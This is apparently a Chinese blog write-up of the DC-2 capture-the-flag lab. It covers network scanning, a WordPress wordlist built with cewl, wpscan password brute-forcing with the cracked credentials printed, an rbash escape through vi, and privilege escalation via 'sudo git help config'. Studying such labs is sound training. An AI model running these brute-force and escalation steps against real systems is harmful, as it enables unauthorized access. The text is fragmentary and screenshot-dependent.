DC-2

DC-2
扫描局域网内所有设备

arp-scan -l

DC-2

nmap -p- -sV 扫描所有端口

DC-2
880,7744端口,访问一下进不去
只能改hosts文件进去
DC-2
页面使用的技术
DC-2

用awvs扫一下(awvs yyds!)
DC-2
可是好像msf没有收录这些漏洞
DC-2
flag提示用cewl

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件

cewl http://dc-2 -w 1.txt

DC-2
nikto工具扫描后台

nikto -host http://192.168.xx.xx   (默认扫描80端口)

DC-2

wpscan(kali中针对wordpress的漏洞扫描工具)

wpscan --url http://www.xxxxx.wiki/

DC-2
admin jerry tom

$ wpscan --url http://dc-2 -U /home/t123/桌面/user.txt -P /home/t123/桌面/cewl.txt //不知道路径可以用pwd看看

DC-2
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

登录,查看到flag2
DC-2
ssh链接后rbash
DC-2

如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受

绕过rbash

compgen -c  //查看当前用户可执行命名,发现有vi

vi编辑器绕过
在命令行中,输入 vi,在末行模式中,输入 :set shell=/bin/bash在这里插入代码片
这里就直接将shell设置为/bin/bash
接着在执行命令 :shell就好了
然后就有一个无限制的shell了
绕过rbash

git提权

sudo git help config
上一篇:s8.一键安装Harbor脚本


下一篇:Jetpack Compose的Modifier顺序问题